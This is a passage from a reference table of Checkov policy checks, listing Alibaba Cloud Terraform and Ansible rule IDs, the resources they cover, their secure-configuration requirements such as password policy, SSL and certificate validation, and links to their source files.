[OSSBucketVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketVersioning.py) | -| 12 | CKV_ALI_11 | resource | alicloud_oss_bucket | Ensure OSS bucket has transfer Acceleration enabled | Terraform | [OSSBucketTransferAcceleration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketTransferAcceleration.py) | -| 13 | CKV_ALI_12 | resource | alicloud_oss_bucket | Ensure the OSS bucket has access logging enabled | Terraform | [OSSBucketAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketAccessLogs.py) | -| 14 | CKV_ALI_13 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires minimum length of 14 or greater | Terraform | [RAMPasswordPolicyLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLength.py) | -| 15 | CKV_ALI_14 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one number | Terraform | [RAMPasswordPolicyNumber.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyNumber.py) | -| 16 | CKV_ALI_15 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one symbol | Terraform | [RAMPasswordPolicySymbol.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicySymbol.py) | -| 17 | CKV_ALI_16 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy expires passwords within 90 days or less | Terraform | [RAMPasswordPolicyExpiration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyExpiration.py) | -| 18 | CKV_ALI_17 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one lowercase letter | Terraform | [RAMPasswordPolicyLowercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLowercaseLetter.py) | -| 19 | CKV_ALI_18 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy prevents password reuse | Terraform | [RAMPasswordPolicyReuse.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyReuse.py) | -| 20 | CKV_ALI_19 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one uppercase letter | Terraform | [RAMPasswordPolicyUppcaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyUppcaseLetter.py) | -| 21 | CKV_ALI_20 | resource | alicloud_db_instance | Ensure RDS instance uses SSL | Terraform | [RDSInstanceSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceSSL.py) | -| 22 | CKV_ALI_21 | resource | alicloud_api_gateway_api | Ensure API Gateway API Protocol HTTPS | Terraform | [APIGatewayProtocolHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/APIGatewayProtocolHTTPS.py) | -| 23 | CKV_ALI_22 | resource | alicloud_db_instance | Ensure Transparent Data Encryption is Enabled on instance | Terraform | [RDSTransparentDataEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSTransparentDataEncryptionEnabled.py) | -| 24 | CKV_ALI_23 | resource | alicloud_ram_account_password_policy | Ensure Ram Account Password Policy Max Login Attempts not > 5 | Terraform | [RAMPasswordPolicyMaxLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyMaxLogin.py) | -| 25 | CKV_ALI_24 | resource | alicloud_ram_security_preference | Ensure RAM enforces MFA | Terraform | [RAMSecurityEnforceMFA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMSecurityEnforceMFA.py) | -| 26 | CKV_ALI_25 | resource | alicloud_db_instance | Ensure RDS Instance SQL Collector Retention Period should be greater than 180 | Terraform | [RDSRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSRetention.py) | -| 27 | CKV_ALI_26 | resource | alicloud_cs_kubernetes | Ensure Kubernetes installs plugin Terway or Flannel to support standard policies | Terraform | [K8sEnableNetworkPolicies.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/K8sEnableNetworkPolicies.py) | -| 28 | CKV_ALI_27 | resource | alicloud_kms_key | Ensure KMS Key Rotation is enabled | Terraform | [KMSKeyRotationIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/KMSKeyRotationIsEnabled.py) | -| 29 | CKV_ALI_28 | resource | alicloud_kms_key | Ensure KMS Keys are enabled | Terraform | [KMSKeyIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/KMSKeyIsEnabled.py) | -| 30 | CKV_ALI_29 | resource | alicloud_alb_acl_entry_attachment | Alibaba ALB ACL does not restrict Access | Terraform | [ALBACLIsUnrestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ALBACLIsUnrestricted.py) | -| 31 | CKV_ALI_30 | resource | alicloud_db_instance | Ensure RDS instance auto upgrades for minor versions | Terraform | [RDSInstanceAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceAutoUpgrade.py) | -| 32 | CKV_ALI_31 | resource | alicloud_cs_kubernetes_node_pool | Ensure K8s nodepools are set to auto repair | Terraform | [K8sNodePoolAutoRepair.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/K8sNodePoolAutoRepair.py) | -| 33 | CKV_ALI_32 | resource | alicloud_ecs_launch_template | Ensure launch template data disks are encrypted | Terraform | [LaunchTemplateDisksAreEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/LaunchTemplateDisksAreEncrypted.py) | -| 34 | CKV_ALI_33 | resource | alicloud_slb_tls_cipher_policy | Alibaba Cloud Cypher Policy are secure | Terraform | [TLSPoliciesAreSecure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/TLSPoliciesAreSecure.py) | -| 35 | CKV_ALI_35 | resource | alicloud_db_instance | Ensure RDS instance has log_duration enabled | Terraform | [RDSInstanceLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogsEnabled.py) | -| 36 | CKV_ALI_36 | resource | alicloud_db_instance | Ensure RDS instance has log_disconnections enabled | Terraform | [RDSInstanceLogDisconnections.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogDisconnections.py) | -| 37 | CKV_ALI_37 | resource | alicloud_db_instance | Ensure RDS instance has log_connections enabled | Terraform | [RDSInstanceLogConnections.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogConnections.py) | -| 38 | CKV_ALI_38 | resource | alicloud_log_audit | Ensure log audit is enabled for RDS | Terraform | [LogAuditRDSEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/LogAuditRDSEnabled.py) | -| 39 | CKV_ALI_41 | resource | alicloud_mongodb_instance | Ensure MongoDB is deployed inside a VPC | Terraform | [MongoDBInsideVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBInsideVPC.py) | -| 40 | CKV_ALI_42 | resource | alicloud_mongodb_instance | Ensure Mongodb instance uses SSL | Terraform | [MongoDBInstanceSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBInstanceSSL.py) | -| 41 | CKV_ALI_43 | resource | alicloud_mongodb_instance | Ensure MongoDB instance is not public | Terraform | [MongoDBIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBIsPublic.py) | -| 42 | CKV_ALI_44 | resource | alicloud_mongodb_instance | Ensure MongoDB has Transparent Data Encryption Enabled | Terraform | [MongoDBTransparentDataEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBTransparentDataEncryptionEnabled.py) | -| 43 | CKV_ANSIBLE_1 | resource | [?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 44 | CKV_ANSIBLE_1 | resource | [?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 45 | CKV_ANSIBLE_1 | resource | [].block[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 46 | CKV_ANSIBLE_1 | resource | [].block[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 47 | CKV_ANSIBLE_1 | resource | [].block[].block[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 48 | CKV_ANSIBLE_1 | resource | [].block[].block[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 49 | CKV_ANSIBLE_1 | resource | [].block[].block[].block[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 50 | CKV_ANSIBLE_1 | resource | [].block[].block[].block[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 51 | CKV_ANSIBLE_1 | resource | [].tasks[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 52 | CKV_ANSIBLE_1 | resource | [].tasks[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 53 | CKV_ANSIBLE_1 | resource | [].tasks[].block[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 54 | CKV_ANSIBLE_1 | resource | [].tasks[].block[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 55 | CKV_ANSIBLE_1 | resource | [].tasks[].block[].block[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 56 | CKV_ANSIBLE_1 | resource | [].tasks[].block[].block[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 57 | CKV_ANSIBLE_1 | resource | [].tasks[].block[].block[].block[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 58 | CKV_ANSIBLE_1 | resource | [].tasks[].block[].block[].block[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 59 | CKV_ANSIBLE_2 | resource | [?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 60 | CKV_ANSIBLE_2 | resource | [?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 61 | CKV_ANSIBLE_2 | resource | [].block[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 62 | CKV_ANSIBLE_2 | resource | [].block[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 63 | CKV_ANSIBLE_2 | resource | [].block[].block[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 64 | CKV_ANSIBLE_2 | resource | [].block[].block[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 65 | CKV_ANSIBLE_2 | resource | [].block[].block[].block[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 66 | CKV_ANSIBLE_2 | resource | [].block[].block[].block[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 67 | CKV_ANSIBLE_2 | resource | [].tasks[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 68 | CKV_ANSIBLE_2 | resource | [].tasks[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 69 | CKV_ANSIBLE_2 | resource | [].tasks[].block[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 70 | CKV_ANSIBLE_2 | resource | [].tasks[].block[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 71 | CKV_ANSIBLE_2 | resource | [].tasks[].block[].block[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 72 | CKV_ANSIBLE_2 | resource | [].tasks[].block[].block[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 73 | CKV_ANSIBLE_2 | resource | [].tasks[].block[].block[].block[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 74 | CKV_ANSIBLE_2 | resource | [].tasks[].block[].block[].block[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 75 | CKV_ANSIBLE_3 | resource | [?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | -| 76 | CKV_ANSIBLE_3 | resource | [?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | -| 77 | CKV_ANSIBLE_3 | resource | [].block[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | -| 78 | CKV_ANSIBLE_3 | resource | [].block[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | -| 79 | CKV_ANSIBLE_3 | resource | [].block[].block[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | -| 80 | CKV_ANSIBLE_3 | resource | [].block[].block[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | -| 81 | CKV_ANSIBLE_3 | resource | [].block[].block[].block[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | -| 82 | CKV_ANSIBLE_3 | resource | [].block[].block[].block[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | -| 83 | CKV_ANSIBLE_3 | resource | [].tasks[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | -| 84 | CKV_ANSIBLE_3 | resource | [].tasks[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | -| 85 | CKV_ANSIBLE_3 | resource | [].tasks[].block[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | -| 86 | CKV_ANSIBLE_3 | resource | [].tasks[].block[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | -| 87 | CKV_ANSIBLE_3 | resource | [].tasks[].block[].block[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | -| 88 | CKV_ANSIBLE_3 | resource | [].tasks[].block[].block[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | -| 89 | CKV_ANSIBLE_3 | resource | [].tasks[].block[].block[].block[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | -| 90 | CKV_ANSIBLE_3 | resource | [].tasks[].block[].block[].block[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | -| 91 | CKV_ANSIBLE_4 | resource | [?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | -| 92 | CKV_ANSIBLE_4 | resource | [?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | -| 93 | CKV_ANSIBLE_4 | resource | [].block[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | -| 94 | CKV_ANSIBLE_4 | resource | [].block[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | -| 95 | CKV_ANSIBLE_4 | resource | [].block[].block[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | -| 96 | CKV_ANSIBLE_4 | resource | [].block[].block[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | -| 97 | CKV_ANSIBLE_4 | resource | [].block[].block[].block[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | -| 98 | CKV_ANSIBLE_4 | resource | [].block[].block[].block[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | -| 99 | CKV_ANSIBLE_4 | resource | [].tasks[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | -| 100 | CKV_ANSIBLE_4 | resource | [].tasks[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | -| 101 | CKV_ANSIBLE_4 | resource | [].tasks[].block[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | -| 102 | CKV_ANSIBLE_4 | resource | [].tasks[].block[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | -| 103 | CKV_ANSIBLE_4 | resource | [].tasks[].block[].block[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | -| 104 | CKV_ANSIBLE_4 | resource | [].tasks[].block[].block[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | -| 105 | CKV_ANSIBLE_4 | resource | [].tasks[].block[].block[].block[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | -| 106 | CKV_ANSIBLE_4 | resource | [].tasks[].block[].block[].block[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | -| 107 | CKV_ANSIBLE_5 | resource | [?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | -| 108 | CKV_ANSIBLE_5 | resource | [?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | -| 109 | CKV_ANSIBLE_5 | resource | [].block[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | -| 110 | CKV_ANSIBLE_5 | resource | [].block[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | -| 111 | CKV_ANSIBLE_5 | resource | [].block[].block[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | -| 112 | CKV_ANSIBLE_5 | resource | [].block[].block[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | -| 113 | CKV_ANSIBLE_5 | resource | [].block[].block[].block[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | -| 114 | CKV_ANSIBLE_5 | resource | [].block[].block[].block[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | -| 115 | CKV_ANSIBLE_5 | resource | [].tasks[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | -| 116 | CKV_ANSIBLE_5 | resource | [].tasks[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | -| 117 | CKV_ANSIBLE_5 | resource | [].tasks[].block[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | -| 118 | CKV_ANSIBLE_5 | resource | [].tasks[].block[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | -| 119 | CKV_ANSIBLE_5 | resource | [].tasks[].block[].block[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | -| 120 | CKV_ANSIBLE_5 | resource | [].tasks[].block[].block[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | 